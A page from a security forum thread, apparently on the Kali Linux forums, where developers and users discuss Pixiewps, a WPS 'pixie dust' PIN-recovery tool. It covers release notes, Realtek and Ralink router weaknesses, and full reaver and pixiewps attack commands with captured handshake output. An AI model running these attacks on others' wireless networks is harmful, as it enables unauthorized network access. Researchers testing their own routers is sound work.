Page 2 of 5 FirstFirst 12345 LastLast
Results 51 to 100 of 244

Thread: Pixiewps: wps pixie dust attack tool

  1. #51
    Join Date
    2015-Apr
    Posts
    1
    I'm interested in your modified reaver version. Does it also test the pin to get the actual paraphrase as well?

    Quote Originally Posted by t6_x View Post
    Finally able to create my account in this forum

    I already emailed the wiire on the tests I've done.

    First of all I made a modified version of reaver to facilitate the tests, this modification is already do a pixie test when a pin is tested on reaver

    [P] E-Nonce: 41: f2: 8c: 82: 53: 3b: df: ........
    [P] PKE: 6b: 0e: 22: cb: cd: 21: ........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7: fb: bc: 21: ab: 3b: 99: 70: 36: 8e: f1: a0: ........
    [+] Sending message M2
    [P] E-Hash1: 1e: d6: 12: 27: 8f: 12: 28: 21: 9a: 54: .........
    [P] E-Hash2: d: f: 34: and: ac: 55: a4: 9e: b3: 95: 31: 7a: 61: b0: ........
    [Pixie-Dust]
    [Pixie-Dust][*] ES-1: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
    [Pixie-Dust][*] ES-2: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00: 00
    [Pixie Dust-][*] PSK1: 76: 46: 96: c7: 5d: e4: 8a: 86: .......
    [Pixie-Dust][*] PSK2: 1b: 5e: 3e: 6b: 19: 89: 4b: 5c: .......
    [Pixie-Dust] [+] WPS pin: 41368541
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    [+] Received message M3
    [+] Sending message M4

    If someone want this version, tell me



    Now with relation to the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1, is a very old router, think it 2004-2005


    It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

    But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

    The seed for generating the random number is based on the date (date, time, seconds) router

    Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


    It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

    But this problem certainly is present in many other models of routers.


    Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

    I will continue to develop and when I have more news come back to post.

    Sorry for the English, I used a translator

  2. #52
    Pixiewps 1.0.5 is out!

    Added a partial implementation of a new attack!

    Vulnerable devices: Realtek (ES-1 = ES-2 = Enrollee nonce). This attack doesn't always work. Also be sure not to use --dh-small with this one! Get the PKR from Wireshark and supply the Enrollee Nonce. Test and report!

    Thanks to Dominique Bongard (again) and also to soxrok2212.

    Bongard tweet: https://twitter.com/Reversity/status/586610963354357762
    Rand function to implement: https://github.com/skristiansson/uCl...lib/random_r.c

  3. #53
    I do not have a much larger practical interest in this attack vector other than as POC; and probably won't spend a ton of time testing it out or using it. but this is still some really nice work! Kudos

  4. #54
    Last edited by t6_x; 2015-04-13 at 23:23.

  5. #55
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Quote Originally Posted by t6_x View Post
    Now with relation to the TP-Link.

    I believe it may be vulnerable to another type of problem.

    I have a TP-Link 740N v1, is a very old router, think it 2004-2005


    It has the Atheros chipset, Linux runs and uses the hostap together with the / dev / random.

    But this firmware version for example has a problem in the generation of random numbers, it may be that this firmware version is with this problem.

    The seed for generating the random number is based on the date (date, time, seconds) router

    Every time I restart the modem, the seed to generate the random number is the same. So it is possible to make bruteforce on all dates, hours, seconds to find the current state of the seed. This makes it possible to generate future seeds to make bruteforce the pin.


    It may be that this problem is only in this firmware version, do not have other routers to test or compare and without having them in the hands is difficult to make the tests.

    But this problem certainly is present in many other models of routers.


    Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.

    I will continue to develop and when I have more news come back to post.
    If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS.

  6. #56
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by t6_x View Post
    Today I met a router where the E-Hash1 and the E-Hash2 was identical and there needed to make a modification in pixie for him to do the bruteforce correctly.
    Someone I am working with has also found an AP where E-Hash1 = E-Hash2. I speak a little Spanish and the other guy speaks it fluently... I guess you do too? Anyways, if you could e-mail me that would be great. My e-mail is my user name @gmail.com

    Thanks!

  7. #57
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    Quote Originally Posted by WaLkZ View Post
    If you can do this brute-force attack in the fiture to work on tp-link 740n it will be awesome because 95% of networks around me are tp-link 740n with turned on WPS.
    i have the same problem!~
    http://www44.zippyshare.com/v/aEY5Jq61/file.html

  8. #58
    Quote Originally Posted by kcdtv View Post
    tp-link is atheros addict but 4 models of TP-Link AP have at least one version with ralink chipset and this ones may probably be affected.(one was reported as but we never got the datas )
    Vendor: TP-LINK
    Model: TD-W8951ND
    Firmware: 3.0.1 Build 110720 Rel.40612
    Chipset: Ralink (RT2860)

    Confirmed vulnerable.

  9. #59
    Join Date
    2015-Apr
    Posts
    9
    I have TP-LINK TD-W8961ND with the same Chipset Ralink (RT2860) but when i tryed Reaver to get the infos it always get stock at M2 is there a solution please

  10. #60
    Join Date
    2015-Apr
    Posts
    2
    Quote Originally Posted by wiire View Post
    Vendor: TP-LINK
    Model: TD-W8951ND
    Firmware: 3.0.1 Build 110720 Rel.40612
    Chipset: Ralink (RT2860)

    Confirmed vulnerable.
    Have tested the following routers with these results : " WPS pin not found! "

    1. WPS Manufacturer: D-Link
    WPS Model Number: DIR-615

    2. WPS Manufacturer: ASUSTeK Computer Inc.
    WPS Model Number: RT-N12

    3. WPS Manufacturer: TP-LINK
    WPS Model Number: 1.0

  11. #61
    Join Date
    2014-Nov
    Location
    Bulgaria
    Posts
    9
    Quote Originally Posted by Jynn View Post
    Have tested the following routers with these results : " WPS pin not found! "

    1. WPS Manufacturer: D-Link
    WPS Model Number: DIR-615

    2. WPS Manufacturer: ASUSTeK Computer Inc.
    WPS Model Number: RT-N12

    3. WPS Manufacturer: TP-LINK
    WPS Model Number: 1.0
    Also D-Link DIR-501

  12. #62
    pixie is not installing.
    it says
    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1
    even libssl-dev isnt installing. its searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
    what to do..???

  13. #63
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Frost.Elrick View Post
    pixie is not installing.
    it says
    gcc -o pixiewps pixiewps.c -lssl -lcrypto -Wall -Werror
    pixiewps.c:46:26: fatal error: openssl/hmac.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1
    even libssl-dev isnt installing. its searching for 1.0.1e-2+deb7u12 but the repository has 1.0.1e-2+deb7u16.
    what to do..???
    Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto

  14. #64
    Join Date
    2013-Jul
    Posts
    844
    The position of the reaver wpc files when using these modded reaver programs is now:

    /usr/local/etc/reaver/

    Files names are the 12digit mac address(no colons) of the target followed by .wpc

    Any unfinished work previously done with the stock version must be copied or moved from the /etc/reaver/ folder to the /usr/local/etc/reaver/ folder. To confirm file position use the following command in the terminal window.

    locate "*.wpc"

    MTeams
    Last edited by mmusket33; 2015-04-27 at 03:31.

  15. #65
    Join Date
    2015-Apr
    Posts
    29
    this thing is wicked, thank you so much. it makes wifi testing so much quicker but I'll forget all the commands. oh well, who needs typing when you have script.

  16. #66
    Join Date
    2014-Jul
    Posts
    2
    with this give me always pin not found!!!

    Theres any solution?

  17. #67

    Exclamation Still No Help

    Quote Originally Posted by slim76 View Post
    Try this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto
    it also givees the same error.
    libssl-dev isnt installing,may be it is causing the problem but i can not get this evn after apt-get update.

  18. #68
    Join Date
    2013-Jul
    Posts
    844
    To: FrostElrick

    Try this:

    Copy the following data between the #### to a text file with leafpad in root and name the file sources.list

    ################

    #placed in /etc/apt/ folder
    deb http://http.kali.org/kali kali main contrib non-free
    deb-src http://http.kali.org/kali kali main contrib non-free
    deb http://security.kali.org/kali-security kali/updates main contrib non-free
    deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
    deb http://http.kali.org /kali main contrib non-free
    deb http://http.kali.org /wheezy main contrib non-free

    ################
    Go to the /etc/apt folder and rename the existing sources.list file to sources.list.orig

    ie sources.list.original

    Now copy the sources.list file in root to the etc/apt folder


    Get an internet connection open a terminal window and


    sudo apt-get install libssl-dev
    sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev


    Now install your modded reaver and pixiewps


    Now go to your /etc/apt folder and erase your sources.list then rename sources.list.orig back to sources.list

    Musket Teams
    Last edited by mmusket33; 2015-04-28 at 00:49.

  19. #69
    Join Date
    2013-Oct
    Posts
    321
    You could try using FrankenScript to download it and set it up, you can then browse the setup output in the frankenscript window by scrolling back.
    If you still get an error then I'd guess your kali installation is broken in some way.

  20. #70
    Pixiewps 1.1 is out!

    Download: GitHub

    What's new:
    - The previous attack now is fully implemented
    - AuthKey computation if --dh-small is specified (also in Reaver). The data can be gathered from a .cap file (manually)
    - Better input parsing with parameters length check
    - More user friendly. Added some examples of use in the usage screen.

    NOTE:
    - In this version the computer/machine time you're running pixiewps on is IMPORTANT. Be sure it's set to the right date and time
    - Althought now pixiewps can be run without a modded version of Reaver (using --dh-small), the modded version made by t6_x and datahead is still recommended

    The (almost) full bruteforce for the new attack is performed using the option -f (--force). I say almost because it starts bruteforcing around the current machine time and goes backwards.

    What is not implemented yet but may come in (a not near) future (so don't ask ):
    - Multithreading (I tried to do a 'quick and dirty' implementation but it did more harm than good)
    - Read all data needed from a .cap (always with --dh-small)

    Below an example of AuthKey computation:

    Last edited by wiire; 2015-05-01 at 19:43. Reason: Fixed some typos

  21. #71
    Join Date
    2013-Mar
    Location
    milano
    Posts
    301
    @wiire all always SUPER thanks!!

  22. #72
    Join Date
    2015-Mar
    Posts
    8
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?

  23. #73
    Join Date
    2015-Mar
    Posts
    127
    Cant wait to try this new version. I will report back soon.

  24. #74
    Join Date
    2013-Mar
    Posts
    3
    Last edited by Extradry; 2015-05-02 at 01:30.

  25. #75
    soo... this works for Atheros now?

  26. #76
    What a beautiful Saturday midday!
    Sun is shining, day off and this magnificent version 1.1 is out!
    Great job wiire!
    So i can confirm that all devices from rtl819x projects are vulnerable if their firmware is based on Realtek SDK (But why wouldn't it be based on the tool designed and provided by realteck to create them?)

    To make it a litlle hard for pixiewps and to really fully try this new -f option ( brute force on seed with time backwarding) i reset my realteck device to factory default ( first build time in 2012)
    In a cheap laptop with poor microprocessor (around 600 key/sec with aircrack-ng ).


    Quote Originally Posted by wn722
    soo... this works for Atheros now?

    you should read back wiire posts in this tread

    Quote Originally Posted by Desuu
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?
    that's just three more arguments ( i think )
    Basicaly if your router has a realtek chipset and you don't get the PIN using pixiewps 1.0 (or using pixiewps 1.1 without the hew features) it wil work with the new pixiewps 1.1 using .f argument
    notice the possibility to compute the authkey form *.cap file that allows you to make a full "offline attack" just by grabbing the required strings in your M packets. (small dh key option , -S, has to be used with reaver and pixiedust)
    Last edited by kcdtv; 2015-05-02 at 10:44.

  27. #77
    @kcdtv
    You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.

    Also I've been told there a routers that after failing retrieving the right date and time from the Internet, reset it to 0 (1st January 1970).

    Any problems compiling on Ubuntu at all?

    @wn722
    I'm afraid that Atheros and Marvell will remain unbreakable.

    As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011 was bought by Marvell. Read it from Wikipedia.

  28. #78
    No problems at all in Ubuntu & Xubuntu
    You should try using -v 3. It prints the seed (Unix datetime) into human readable date and time.
    Sweet!
    Also I've been told there a routers that after failing retrieving the right date and time from the Internet, reset it to 0 (1st January 1970).
    lol
    I can tell you that is not the case with rtl8192x based routers (i have alfa AIP-W525H and totolink NR301RT) that have been using for years... the farest they go back to is last build... both of mine are form 2012 and checking and i think, nut i may be wrong that we shouldn't have to go more backward than that date that appear in probes WPS : EV-2010-09-20 as i have the same for both routers which are form different month, it seems to be a genric base date time ..

    As a side note Atheros hired Jouni Malinen the creator of hostapd in 2008 and in 2011
    this guys from atheros know who they hire! For sure we won't get es-1=es-2=0 with somobody like this beyond the code XD

  29. #79
    Quote Originally Posted by Desuu View Post
    Thanks for the new update, but it starts to get confusing with all these arguments now can we get a small tutorial ?
    I think soxrok is going to upload a new tutorial. There are some examples at the bottom of the usage screen. But basically what you want to do normally is launching pixiewps without --force. Then if the pin is not found and pixiewps prints a warning saying that the router might be vulnerable, then you may wanna try with --force. What pixiewps does is using the current time and date as reference and going backwards trying to recover the seed because the router time and date might be not right (like set at factory time).

    Also I set the default verbosity level to 2 but you may probably want to set it to 3.

  30. #80
    Quote Originally Posted by wiire View Post
    Yes sorry I should've clarified. The --force option is used only for what I call mode 4 which is Realtek 's PRNG seed bruteforce. I was planning on adding modes selection but I didn't and I left those modes on the usage screen and I didn't want to explicitly refer to vendors in the program.

    The best practice is to run the program without -f and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries for every possible vulnerability. When it bruteforce the new PRNG though (that is mode 4) it tests normally for a small window of time (approximately 10 days) because the new bruteforce is more consuming power.

    So --force is basically used only if the router has set its time to past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that.

    Also would you mind replying on the pixiewps thread for program related questions? Thanks.

    Thank you very much for clarifying Wiire.

  31. #81
    Hello , @Wiire @Kcdtv


    Chipset : Realtek RTL8671

    Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

    Command : pixiewps -e -r -s -z -a -n -f

    I m waiting for 3 hours and Pixiewps is continiou...

    What can I do ? Suggestion?

    a ) Give up

    b) Continiou , No risk no fun


  32. #82
    We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
    But wire has been told that some realteck chipset could go back until 1970
    so if you can leave it that would be great.
    This chipset could be the one... it is not form the X project serie, so it has good chance.
    Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
    I was also thinking about an option that allows to define a point in time.
    Let's say i choose 01-01-2012 00:00
    Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
    that maybe a bit weird and strange but i thought it may be intersiting
    cheers

  33. #83
    Quote Originally Posted by Saydamination View Post
    Hello , @Wiire @Kcdtv


    Chipset : Realtek RTL8671

    Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

    Command : pixiewps -e -r -s -z -a -n -f

    I m waiting for 3 hours and Pixiewps is continiou...

    What can I do ? Suggestion?

    a ) Give up

    b) Continiou , No risk no fun

    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

  34. #84
    Quote Originally Posted by kcdtv View Post
    We have more or less the same power (i sayed 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
    But wire has been told that some realteck chipset could go back until 1970
    so if you can leave it that would be great.
    This chipset could be the one... it is not form the X project serie, so it has good chance.
    Thinking about pixiewps maybe it would be a good idea to have just one try with seed 1970 at the begining of the brutee force and then start the brute force backward
    I was also thinking about an option that allows to define a point in time.
    Let's say i choose 01-01-2012 00:00
    Then the brute force would lstart from the defined time to day time and if the PIN is not found it would go from 01-01-2012 00:01 to 1970 (like to sequences)
    that maybe a bit weird and strange but i thought it may be intersiting
    cheers
    Yes now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said I run it on my desktop PC which takes only 20 minutes to exaust the keyspace so... yeah...

    If some of you get:

    "[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."

    But doesn't find the pin after the --force bruteforce (and your computer time is ok) let me know. I assumed that the router cannot have set time to future but... you never know...

  35. #85
    hello @Kcdtv and Wiire ,

    Many thanks for comment and suggestion... you're absolutely right...Your idea is great about option..

    I m really wondering what would happen it ... So I wanna wait until ending test

    I will turn back with test results..

    Cheers..
    Last edited by Saydamination; 2015-05-02 at 15:42. Reason: Add Ok..

  36. #86
    Quote Originally Posted by wiire View Post
    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
    Hello Wiire,

    Test Finished ... I m not lucky..

    Reaver Results:

    Code:
    Associated with 90:F6:52:xX:xX:BX (ESSID: x)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
    [P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73
    [P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a
    [+] Sending M2 message
    [P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
    [P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
    [Pixie-Dust]  
    [Pixie-Dust]   Pixiewps 1.1
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 13 s
    [Pixie-Dust]  
    [Pixie-Dust]   [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    Pixiewps Results:

    Code:
    pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 27220 s
    Pin:12345670
    Last edited by Saydamination; 2015-05-16 at 21:08. Reason: Add pin

  37. #87
    Quote Originally Posted by Saydamination View Post
    Hello Wiire,

    Test Finished ... I m not lucky..

    Code:
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.

  38. #88
    You are right Wiıre.. This router is different .. I Think there is some protect ..

    I will try other options...

    This is Wireshark screen:

    http://imgur.com/IkpSn7C

  39. #89
    Code:
    root@bt:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 8c:da:44:e4:bf:e5:e4:a5:72:1e:c2:8e:8e:a4:c9:1f:28:16:95:f3:b8:fd:2c:9a:ad:5d:27:51:38:25:5d:cf:1f:25:35:65:99:f5:a3:1f:bc:c2:ff:59:45:3f:8d:a6:9a:72:c6:9d:1c:de:c9:2f:5e:e4:4f:f4:7a:7c:53:50:c7:da:d4:50:37:b5:a0:1d:bb:8c:a5:35:fc:b5:cd:2b:22:3b:5e:2e:23:51:10:bc:8e:7e:c3:bd:65:3d:35:dd:5c:c6:83:ef:69:0d:6d:e7:d7:b2:e1:98:c7:53:0b:50:ce:3a:dd:66:42:6b:0f:34:50:13:f1:71:0e:3c:f1:ab:a6:0d:23:22:08:f5:b1:7c:b2:dd:c5:b6:91:c6:fe:d6:ca:fe:e0:7b:ed:22:90:3c:06:d3:9c:ae:b7:77:79:ca:2a:cc:42:ac:3f:07:0b:73:69:31:7c:f9:69:ea:24:69:d1:4e:f3:b1:cf:bb:22:76:60:3f:11:8a:91:46:ba:a7 -s 2c:ed:7a:66:54:84:55:80:ae:28:52:78:7a:bb:41:a8:37:42:bf:fc:cf:2e:cd:4d:53:86:06:0c:0b:79:85:19 -z 8a:d4:8e:83:e0:00:34:99:78:c5:2b:92:11:ff:f6:ae:18:1f:15:1a:da:f7:5d:41:44:8f:ef:00:26:75:38:0a -a db:a5:68:39:87:53:fa:7a:1c:2a:ce:3f:f9:c8:5d:de:8b:63:e8:c6:b8:97:18:04:30:3a:90:7a:1f:aa:20:80 -n 45:7b:18:6c:14:80:7e:17:7f:d6:22:84:43:74:49:ad -f 
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 16902 s
    
    root@bt:~#
    Last edited by Saydamination; 2015-05-04 at 19:18.

  40. #90
    Join Date
    2015-May
    Posts
    1
    Hi,

    I cannot install pixiewps, I get the following message:

    gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
    In file included from pixiewps.c:51:0:
    pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1

    I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto and also the recommendation given by mmusket33 but I still have the same problem. I would really appreciate if anybody could help me... Thanks in advance.

  41. #91
    Join Date
    2015-May
    Posts
    1
    @KIMW

    pixiewps is now in kali official rep you can install it with "apt-get install pixiewps"

  42. #92
    If your kali has been updated as of today may-7, do you have the necessary tools installed and updated to successfully do the pixiewps attack? I have been testing my routers with wps enabled and firewall turned off etc with no luck, I had some luck on a friends dlink when I used the pin but it did not spit out the key. I am attaching what I seem to always get on my broadcom and asus, the zyxel just won't work at all. I am trying both adapters 36neh and the 51nh with no luck. Especially never spits out the Hashes (ehash1 and ehash2) during the transaction. I am thinking I might have a bad installation of something. I have played around with trying different options as well, also read through many tutorials which show people always getting the ehash1 and ehash2 which I never seem to get, maybe all the routers I try are not supported to spit those out....

    root@kali:~# time reaver -i wlan1mon -c 11 -b A8:39:44:41:10:E0 -K 1 -vv

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

    [+] Switching wlan1mon to channel 11
    [+] Waiting for beacon from A8:39:44:41:10:E0
    [+] Associated with A8:39:44:41:10:E0 (ESSID: mil0)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d5:06:2e:f0:0b:f1:39:03:f3:e5:df:fe:c1:9f:cc:fb
    [P] PKE: 90:02:ed:eb:04:1b:a3:6a:b4:2a:7f:1b:79:c2:d9:ad:e2 :c2:3b:ab:ff:fa:82:27:c7:2f:e7:6a:91:0f:51:2d:20:e c:9d:02:f7:41:39:b4:c7:be:de:ca:8d:26:0e:af:19:a3: 8a:e4:84:cc:69:02:e8:f9:ec:15:a0:e2:87:32:0c:54:c6 :1c:4e:19:3d:25:02:49:fe:59:25:66:38:83:22:19:23:a a:f5:90:2e:41:b1:53:c4:68:94:ee:ea:a5:f0:4c:d8:d9: ec:c0:1b:85:0c:64:2f:3f:fd:6d:4b:1d:4f:2c:ea:1b:d0 :dd:ee:e5:85:ae:d5:ca:61:05:b0:8a:1d:23:df:b1:b6:f 3:6d:04:78:cd:14:c2:c2:80:48:54:4e:4c:77:91:9e:41: b9:65:94:5f:e9:06:6d:8f:90:d3:28:ff:f0:b7:2e:78:e3 :93:b6:ef:b1:26:43:b0:45:c5:0a:1a:be:20:6c:a5:3c:b e:3b:7e:2c:5e:a1:0b:19:b1
